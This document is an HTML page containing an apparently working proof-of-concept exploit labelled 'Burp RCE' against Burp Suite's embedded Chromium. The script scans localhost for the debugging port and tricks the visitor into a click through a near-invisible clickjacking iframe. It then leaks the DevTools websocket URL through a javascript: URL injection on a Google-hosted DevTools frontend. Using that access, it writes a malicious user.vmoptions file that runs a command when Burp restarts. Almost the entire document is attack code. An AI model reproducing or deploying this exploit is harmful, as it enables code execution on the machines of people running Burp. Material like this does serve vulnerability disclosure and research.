<html>
  <head>
    <link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🚀</text></svg>">

    <style>
    *{
      font-family: Arial, Courier, sans-serif
    }
    .button {
          background: #ec8f6a;
          border-color: #ec8f6a;
          color: #fff;
          width: 300px;
          height: 60px;
          font-family: "Nunito", sans-serif;
          font-size: 22px;
          text-transform: uppercase;
          letter-spacing: 1.3px;
          font-weight: 700;

          border: none;
          border-width: 1px;
          border-radius: 5px;
          outline: none;
          position: absolute;
          padding: 10px;

          left: 10px; top: 20px; 
          /*display: none;*/
      }
      #wrapper{
        height: 200px;
        overflow: hidden;
        position:relative;
        height: 100px;
        width: 400px;
        display: none;
      }
      #clickJack{
          transform: scale(4);
          transform-origin: 10px 100px;
          opacity: 0.04;
      }

#console {
    position: fixed;
    left: 0; bottom: 0;
    width: 100%;
    height: 200px;
    margin: 0;
    padding-bottom: 10px;
    background-color: #343434;
    overflow-y: scroll;
}
#console pre {
    position: relative;
    font-family: 'Lucida Console', monospace;
    font-size: 14px;
    padding-left: 30px;
    padding-bottom: 0;
    display: block;
    overflow: hidden;
    margin: 0;
    color: white;
}
#console pre:nth-child(1) {
    margin-top: 25px;
}
#console pre.breakline {
    padding-bottom: 12px;
}



.done{
  color:green;
}

.done_done{
  color:green;
  font-size: 30px;
  padding-top: 20px;
}

.error{
  color:#ff0033;
}

.loading{
  color:orange;
}

.loading:after {
  overflow: hidden;
  display: inline-block;
  vertical-align: bottom;
  -webkit-animation: ellipsis steps(4,end) 900ms infinite;      
  animation: ellipsis steps(4,end) 900ms infinite;
  content: "\2026"; /* ascii code for the ellipsis character */
  width: 0px;
}

@keyframes ellipsis {
  to {
    width: 20px;    
  }
}

@-webkit-keyframes ellipsis {
  to {
    width: 20px;    
  }
}


    </style>

    <script src="chrome-remote-interface.js"></script>
    <script src="utils.js"></script>

    <script>

      async function init() {
        const clickJackFrm = document.getElementById('clickJack');
        const bridgeFrm = document.getElementById('bridge');
        const wrapperDiv = document.getElementById('wrapper');

        clickJackFrm.addEventListener('load', frameInit);
        
        async function frameInit() {
          
          clickJackFrm.removeEventListener('load', frameInit);
          setStep("step2", "loading");
          // wait for the click and the second page to load
          // use the XSS to trigger top.postMessage with the URL / Token 
          clickJackFrm.addEventListener('load', async() => {
            setStep("step2", "done");
            bridgeFrm.src = `https://chrome-devtools-frontend.appspot.com/serve_rev/@191797/devtools.html?remoteFrontendUrl=javascript:top.postMessage(top.frames[1].location.href,"*")`;
            setStep("step3", "loading")
          });

          // parse out the websocket URL 
          window.addEventListener("message", async(event) => {
            if (event.origin == "https://chrome-devtools-frontend.appspot.com") {
              let ws = "ws://" + event.data.match(/ws=(.*?)\&/)[1];
              wrapperDiv.style.display = "none";
              run(ws)
            }
          }, false);

        }
        
        setStep("step1", "loading")

        var t0 = performance.now();
        var port = await getPort(65000, 40000, 100, 200, log);
        var elapsed = (performance.now() - t0);

        if(port){
          setStep("step1", "done")
          log(`found port ${port} in ${elapsed} ms.`);
          
          // Burp open and closes tabs so we can force chrome to open a blank tab that will stay open to hook  
          await fetch(`http://127.0.0.1:${port}/json/new?about:blank`,{mode: 'no-cors'});
          await fetch(`http://127.0.0.1:${port}/json/new?about:blank`,{mode: 'no-cors'});
          await fetch(`http://127.0.0.1:${port}/json/new?about:blank`,{mode: 'no-cors'});
          await fetch(`http://127.0.0.1:${port}/json/new?about:blank`,{mode: 'no-cors'});

          // set the iframe to the URL to clickjack
          setTimeout(()=>{
            clickJackFrm.src = 'http://127.0.0.1:' + port;
            wrapperDiv.style.display = 'block';
          }, 5000)
          
        }else{
          setStep("step1", "error")
          log("cound not find port")
        }
      };

      window.addEventListener("load", init);
      
      async function run(ws){
        try{

          // this is used to trick chrome-remote-interface into being usable in the browser
          // we are sending it the websocket URL for the "page" from the click instead of the "browser"
          window.criRequest = function(options, cb) {
            if(options.path == '/json/list'){
              cb(null, JSON.stringify([{"webSocketDebuggerUrl": ws}]))
            }
          }
          const client = await window.CDP({local:true});
          const { Page, Runtime} = client;
          
          setStep("step3", "done");

          // wait until we can execute javascript
          Runtime.executionContextCreated(async info => {
            log((await writeFile('/Applications/Burp Suite Professional.app/Contents/','user.vmoptions',`-XX:OnOutOfMemoryError=open -a Calculator\n-Xmx5m`)).result.value);
            setStep("step1", "");setStep("step2", "");setStep("step3", "");setStep("step4", "")
            setStep("step5", "done_done")
          });
          
          await Runtime.enable();

          async function writeFile(path, filename, content, executionContextId){
            setStep("step4", "loading")
            // set the download behavior to "allow" and the path to save the file 
            await Page.setDownloadBehavior({behavior: "allow", downloadPath: path});
            // call this function in the browser
            return await Runtime.callFunctionOn({
              functionDeclaration: ((filename, content) => {
                // create a file "blob" then force a download
                var myBlob = new Blob([content], {type: "text/plain"});
                blobURL = URL.createObjectURL(myBlob);
                var link = document.createElement("a");
                link.setAttribute("href", blobURL);
                link.setAttribute("download", filename);
                document.body.appendChild(link);
                link.click();
                return blobURL;
              }).toString(), 
              returnByValue: true,
              executionContextId: 1,
              arguments:[
                {"value":filename},
                {"value":content}
              ]
            });
          }
          
        }catch(e){
          setStep("step3", "error")
          console.log(e)
        }
      }

      function log(msg, color){
        if(!msg) return;
        let ele = document.createElement('pre');
        let consoleEle = document.getElementById('console')
        consoleEle.appendChild(ele);
        ele.innerText += `> ${msg}\n`;
        ele.scrollIntoView(true);
      }
      
      function setStep(step, state){
        document.getElementById(step).className = state;
      }
      

    </script>
  </head>


  <body>
    <h1 style="color: #f63;">Burp RCE</h1>
    <hr />
    <ol style="color:gray;">
      <li id="step1" class="loading" >Sniffing for Chromium port.</li>
      <li id="step2" >Waiting for user to click.</li>
      <li id="step3" >Connecting to websocket.</li>
      <li id="step4" >Forcing download / writing user.vmoptions file to disk.</li>
      <li id="step5" >Done! Restart Burp.</li>
    </ol>
    <iframe id="bridge" style="display:none" src=""></iframe>
    <div id="wrapper">
      <button id="wrapBtn" class="button">Click Me!!!</button>
      <iframe id="clickJack" style="position: absolute;" src=""></iframe>
    </div>

    <div id="console"></div>

  </body>
</html>
